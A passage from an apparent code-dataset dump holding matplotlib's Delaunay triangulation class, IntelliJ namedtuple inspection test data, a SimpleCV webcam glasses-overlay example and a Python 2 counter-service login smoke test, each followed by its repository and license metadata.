    """Duplicate points were passed in to the triangulation routine.

    Emitted by Triangulation.__init__ when repeated (x, y) input points
    are detected; the duplicates are dropped before triangulating.
    """
class Triangulation(object):
    """A Delaunay triangulation of points in a plane.

    Triangulation(x, y)
    x, y -- the coordinates of the points as 1-D arrays of floats

    Let us make the following definitions:
        npoints = number of points input
        nedges = number of edges in the triangulation
        ntriangles = number of triangles in the triangulation
        point_id = an integer identifying a particular point (specifically, an
            index into x and y), range(0, npoints)
        edge_id = an integer identifying a particular edge, range(0, nedges)
        triangle_id = an integer identifying a particular triangle
            range(0, ntriangles)

    Attributes: (all should be treated as read-only to maintain consistency)
      x, y -- the coordinates of the points as 1-D arrays of floats.

      circumcenters -- (ntriangles, 2) array of floats giving the (x,y)
        coordinates of the circumcenters of each triangle (indexed by a
        triangle_id).

      edge_db -- (nedges, 2) array of point_id's giving the points forming
        each edge in no particular order; indexed by an edge_id.

      triangle_nodes -- (ntriangles, 3) array of point_id's giving the points
        forming each triangle in counter-clockwise order; indexed by a
        triangle_id.

      triangle_neighbors -- (ntriangles, 3) array of triangle_id's giving the
        neighboring triangle; indexed by a triangle_id.
        The value can also be -1 meaning that that edge is on the convex hull
        of the points and there is no neighbor on that edge. The values are
        ordered such that triangle_neighbors[tri, i] corresponds with the edge
        *opposite* triangle_nodes[tri, i]. As such, these neighbors are also
        in counter-clockwise order.

      hull -- list of point_id's giving the nodes which form the convex hull
        of the point set. This list is sorted in counter-clockwise order.

    Duplicate points.
      If there are no duplicate points, Triangulation stores the specified
      x and y arrays and there is no difference between the client's and
      Triangulation's understanding of point indices used in edge_db,
      triangle_nodes and hull.

      If there are duplicate points, they are removed from the stored
      self.x and self.y as the underlying delaunay code cannot deal with
      duplicates. len(self.x) is therefore equal to len(x) minus the
      number of duplicate points. Triangulation's edge_db, triangle_nodes
      and hull refer to point indices in self.x and self.y, for internal
      consistency within Triangulation and the corresponding Interpolator
      classes. Client code must take care to deal with this in one of
      two ways:

      1. Ignore the x,y it specified in Triangulation's constructor and
         use triangulation.x and triangulation.y instead, as these are
         consistent with edge_db, triangle_nodes and hull.

      2. If using the x,y the client specified then edge_db,
         triangle_nodes and hull should be passed through the function
         to_client_point_indices() first.
    """
    def __init__(self, x, y):
        self.x = np.asarray(x, dtype=np.float64)
        self.y = np.asarray(y, dtype=np.float64)
        if self.x.shape != self.y.shape or len(self.x.shape) != 1:
            raise ValueError("x,y must be equal-length 1-D arrays")
        self.old_shape = self.x.shape
        duplicates = self._get_duplicate_point_indices()
        if len(duplicates) > 0:
            warnings.warn(
                "Input data contains duplicate x,y points; some values are "
                "ignored.",
                DuplicatePointWarning,
            )
            # self.j_unique is the array of non-duplicate indices, in
            # increasing order.
            self.j_unique = np.delete(np.arange(len(self.x)), duplicates)
            self.x = self.x[self.j_unique]
            self.y = self.y[self.j_unique]
        else:
            self.j_unique = None
        # If there are duplicate points, need a map of point indices used
        # by delaunay to those used by client.  If there are no duplicate
        # points then the map is not needed.  Either way, the map is
        # conveniently the same as j_unique, so share it.
        self._client_point_index_map = self.j_unique
        self.circumcenters, self.edge_db, self.triangle_nodes, \
            self.triangle_neighbors = delaunay(self.x, self.y)
        self.hull = self._compute_convex_hull()

    def _get_duplicate_point_indices(self):
        """Return array of indices of x,y points that are duplicates of
        previous points.  Indices are in no particular order.
        """
        # Indices of sorted x,y points.
        j_sorted = np.lexsort(keys=(self.x, self.y))
        # A point is a duplicate when both coordinates match its sorted
        # predecessor; the first point can never be a duplicate.
        mask_duplicates = np.hstack([
            False,
            (np.diff(self.x[j_sorted]) == 0) &
            (np.diff(self.y[j_sorted]) == 0),
        ])
        # Array of duplicate point indices, in no particular order.
        return j_sorted[mask_duplicates]

    def _compute_convex_hull(self):
        """Extract the convex hull from the triangulation information.

        The output will be a list of point_id's in counter-clockwise order
        forming the convex hull of the data set.
        """
        border = (self.triangle_neighbors == -1)
        # Map each hull node to the next hull node, counter-clockwise.
        edges = {}
        edges.update(dict(zip(self.triangle_nodes[border[:, 0]][:, 1],
                              self.triangle_nodes[border[:, 0]][:, 2])))
        edges.update(dict(zip(self.triangle_nodes[border[:, 1]][:, 2],
                              self.triangle_nodes[border[:, 1]][:, 0])))
        edges.update(dict(zip(self.triangle_nodes[border[:, 2]][:, 0],
                              self.triangle_nodes[border[:, 2]][:, 1])))
        # Take an arbitrary starting point and its subsequent node
        hull = list(edges.popitem())
        while edges:
            hull.append(edges.pop(hull[-1]))
        # hull[-1] == hull[0], so remove hull[-1]
        hull.pop()
        return hull

    def to_client_point_indices(self, array):
        """Converts any array of point indices used within this class to
        refer to point indices within the (x,y) arrays specified in the
        constructor before duplicates were removed.
        """
        if self._client_point_index_map is not None:
            return self._client_point_index_map[array]
        else:
            return array

    def linear_interpolator(self, z, default_value=np.nan):
        """Get an object which can interpolate within the convex hull by
        assigning a plane to each triangle.

        z -- an array of floats giving the known function values at each point
          in the triangulation.
        """
        z = np.asarray(z, dtype=np.float64)
        if z.shape != self.old_shape:
            raise ValueError("z must be the same shape as x and y")
        if self.j_unique is not None:
            z = z[self.j_unique]
        return LinearInterpolator(self, z, default_value)

    def nn_interpolator(self, z, default_value=np.nan):
        """Get an object which can interpolate within the convex hull by
        the natural neighbors method.

        z -- an array of floats giving the known function values at each point
          in the triangulation.
        """
        z = np.asarray(z, dtype=np.float64)
        if z.shape != self.old_shape:
            raise ValueError("z must be the same shape as x and y")
        if self.j_unique is not None:
            z = z[self.j_unique]
        return NNInterpolator(self, z, default_value)

    def prep_extrapolator(self, z, bbox=None):
        """Return (new_triangulation, extended_z) with three distant
        pseudo-points added so interpolation covers the whole bbox.

        The pseudo-point values come from a least-squares plane fit to z,
        so extrapolated values follow the overall trend of the data.
        """
        if bbox is None:
            bbox = (self.x[0], self.x[0], self.y[0], self.y[0])
        minx, maxx, miny, maxy = np.asarray(bbox, np.float64)
        minx = min(minx, np.minimum.reduce(self.x))
        miny = min(miny, np.minimum.reduce(self.y))
        maxx = max(maxx, np.maximum.reduce(self.x))
        maxy = max(maxy, np.maximum.reduce(self.y))
        M = max((maxx - minx) / 2, (maxy - miny) / 2)
        midx = (minx + maxx) / 2.0
        midy = (miny + maxy) / 2.0
        xp, yp = np.array([[midx + 3 * M, midx, midx - 3 * M],
                           [midy, midy + 3 * M, midy - 3 * M]])
        x1 = np.hstack((self.x, xp))
        y1 = np.hstack((self.y, yp))
        newtri = self.__class__(x1, y1)
        # do a least-squares fit to a plane to make pseudo-data
        xy1 = np.ones((len(self.x), 3), np.float64)
        xy1[:, 0] = self.x
        xy1[:, 1] = self.y
        # Fix: numpy.dual was deprecated in NumPy 1.20 and later removed;
        # numpy.dual.lstsq was simply an alias for numpy.linalg.lstsq.
        from numpy.linalg import lstsq
        c, res, rank, s = lstsq(xy1, z)
        zp = np.hstack((z, xp * c[0] + yp * c[1] + c[2]))
        return newtri, zp

    def nn_extrapolator(self, z, bbox=None, default_value=np.nan):
        newtri, zp = self.prep_extrapolator(z, bbox)
        return newtri.nn_interpolator(zp, default_value)

    def linear_extrapolator(self, z, bbox=None, default_value=np.nan):
        newtri, zp = self.prep_extrapolator(z, bbox)
        return newtri.linear_interpolator(zp, default_value)

    def node_graph(self):
        """Return a graph of node_id's pointing to node_id's.

        The arcs of the graph correspond to the edges in the triangulation.

        {node_id: set([node_id, ...]), ...}
        """
        g = {}
        for i, j in self.edge_db:
            s = g.setdefault(i, set())
            s.add(j)
            s = g.setdefault(j, set())
            s.add(i)
        return g
| alephu5/Soundbyte | environment/lib/python3.3/site-packages/matplotlib/delaunay/triangulate.py | Python | gpl-3.0 | 9,923 |
from collections import namedtuple
MyTup1 = namedtuple(<warning descr="Unexpected argument">bar=''</warning><warning descr="Parameter 'field_names' unfilled"><warning descr="Parameter 'typename' unfilled">)</warning></warning>
MyTup2 = namedtuple("MyTup2", "bar baz")
class MyTup3(namedtuple(<warning descr="Unexpected argument">bar=''</warning><warning descr="Parameter 'field_names' unfilled"><warning descr="Parameter 'typename' unfilled">)</warning></warning>):
pass
class MyTup4(namedtuple("MyTup4", "bar baz")):
pass
# empty
MyTup2(<warning descr="Parameter 'bar' unfilled"><warning descr="Parameter 'baz' unfilled">)</warning></warning>
# one
MyTup2(bar=''<warning descr="Parameter 'baz' unfilled">)</warning>
MyTup2(baz=''<warning descr="Parameter 'bar' unfilled">)</warning>
# two
MyTup2('', '')
MyTup2(bar='', baz='')
MyTup2(baz='', bar='')
# three
MyTup2(bar='', baz='', <warning descr="Unexpected argument">foo=''</warning>)
MyTup2('', '', <warning descr="Unexpected argument">''</warning>)
# empty
MyTup4(<warning descr="Parameter 'bar' unfilled"><warning descr="Parameter 'baz' unfilled">)</warning></warning>
# one
MyTup4(bar=''<warning descr="Parameter 'baz' unfilled">)</warning>
MyTup4(baz=''<warning descr="Parameter 'bar' unfilled">)</warning>
# two
MyTup4('', '')
MyTup4(bar='', baz='')
MyTup4(baz='', bar='')
# three
MyTup4(bar='', baz='', <warning descr="Unexpected argument">foo=''</warning>)
MyTup4('', '', <warning descr="Unexpected argument">''</warning>)
| paplorinc/intellij-community | python/testData/inspections/PyArgumentListInspection/initializingCollectionsNamedTuple.py | Python | apache-2.0 | 1,506 |
#!/usr/bin/python
import time
from SimpleCV import *
def check_eyes(eyes):
    """Return True when at least two candidate eye features were found.

    Accepts None or an empty feature set.  Always returns a real bool
    (the previous version returned the falsy input itself, e.g. None).
    """
    return bool(eyes) and len(eyes) >= 2
def process_eyes(image, eyes):
    """Measure the separation of the two most recent eye detections.

    Returns (dx, dy, right_eye) where dx/dy are the horizontal/vertical
    offsets between the eyes, or (None, None, None) when the eyes are
    too close together horizontally to be a plausible pair.
    """
    delta = eyes[-1].coordinates() - eyes[-2].coordinates()
    dx, dy = delta
    if dx > 0:
        right_eye = eyes[-2]
    else:
        dx = -dx
        right_eye = eyes[-1]
    # Demand a minimum horizontal separation to reduce false matches.
    if dx > image.width / 15:
        return (dx, dy, right_eye)
    return (None, None, None)
def draw_glasses(image, eye_info, glasses):
    """Overlay the glasses image on the detected right eye.

    eye_info is the (dx, dy, right_eye) tuple produced by process_eyes().
    Returns the horizontally re-flipped composite; if the blit fails for
    any reason the unmodified (re-flipped) frame is returned instead.
    """
    # Fix: tuple parameters in a def were removed in Python 3 (PEP 3113);
    # unpack inside the body instead.  Callers still pass the tuple.
    dx, dy, right_eye = eye_info
    rotation = 0.5 * dy  # tilt the glasses with the line between the eyes
    try:
        new_glasses = glasses.scale(int(2.75 * dx), right_eye.height())
        mask = new_glasses.invert()
        new_glasses = new_glasses.rotate(rotation, fixed=False)
        mask = mask.rotate(rotation, fixed=False)
        image = image.blit(new_glasses, right_eye.topLeftCorner(), alphaMask=mask)
    except Exception:
        # Best-effort compositing: on any image-op failure just show the frame.
        pass
    return image.flipHorizontal()
def main():
    """Grab camera frames forever, tracking eyes and drawing the glasses.

    The last confidently detected eye position is reused on frames where
    detection fails, so the glasses stay on once they have been placed.
    """
    glasses = Image('deal_with_it.png', sample=True).flipHorizontal()
    camera = Camera()
    position = None
    while True:
        frame = camera.getImage().scale(0.5).flipHorizontal()
        eyes = frame.findHaarFeatures("eye")
        if check_eyes(eyes):
            candidate = process_eyes(frame, eyes)
            if candidate[0]:
                position = candidate
        if position is not None:
            frame = draw_glasses(frame, position, glasses)
        else:
            frame = frame.flipHorizontal()
        frame.show()
if __name__ == "__main__":
    # Entry point: start the webcam loop (runs until interrupted).
    main()
| sightmachine/SimpleCV | SimpleCV/examples/detection/dealwithit.py | Python | bsd-3-clause | 1,525 |
#!/usr/bin/env python
from create import create_account
from login import login
from request import toto_request
from uuid import uuid4
def checkresponse(response):
    """Abort the script if *response* carries an error; otherwise pass it through.

    Prints the server-supplied error message and exits on failure, so
    callers can wrap every request in this check.
    """
    if 'error' in response:
        # Parenthesized print of a single value behaves identically on
        # Python 2 and is valid Python 3 (the statement form is py2-only).
        print(response['error'])
        exit()
    return response
def verify_count(response, n):
    """Exit unless *response* reports a counter value of exactly *n*.

    Delegates error checking to checkresponse() first, then compares the
    'count' field of the result payload against the expected value.
    """
    response = checkresponse(response)
    count = response['result']['count']
    if n != count:
        # Parenthesized prints work identically on Python 2 and 3.
        print('Counter not incrementing, expected %s got %s' % (n, count))
        print(response)
        exit()
    return response
# Smoke-test the counter service: create two accounts and verify that the
# per-session counter increments and resets correctly after re-login.
user_id = uuid4().hex
password = uuid4().hex
print "user_id: %s password: %s" % (user_id, password)
print checkresponse(create_account(user_id, password))
# create_account writes session credentials to session.conf; load them.
session = {}
execfile('session.conf', session, session)
# The counter must advance 1, 2, 3 within one session.
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
# NOTE(review): the bare string below is a no-op -- presumably meant to be
# "print 're-authenticate'"; confirm before changing output.
're-authenticate'
print checkresponse(login(user_id, password))
session = {}
execfile('session.conf', session, session)
# After re-authentication the counter should restart from 1.
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
print 'new user'
# Repeat the whole scenario with a fresh account.
user_id = uuid4().hex
password = uuid4().hex
print "user_id: %s password: %s" % (user_id, password)
print checkresponse(create_account(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
# NOTE(review): same no-op bare string as above.
're-authenticate'
print checkresponse(login(user_id, password))
session = {}
execfile('session.conf', session, session)
print verify_count(toto_request('increment', session=session), 1)
print verify_count(toto_request('increment', session=session), 2)
print verify_count(toto_request('increment', session=session), 3)
print 'Session storage ok'
| JeremyOT/Toto | templates/toto/simple/scripts/test_server.py | Python | mit | 1,998 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.